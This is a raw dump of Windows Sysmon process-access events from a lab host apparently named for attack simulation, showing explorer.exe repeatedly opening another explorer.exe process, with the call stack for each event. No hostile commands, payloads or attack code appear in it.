16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246172Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246171Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246170Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246169Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246168Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246167Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246166Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246165Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246164Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246163Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246162Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246161Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246160Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246159Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246158Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246157Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246156Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246155Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246154Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246153Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246152Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246151Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246150Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246149Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246148Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246147Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246146Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246145Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 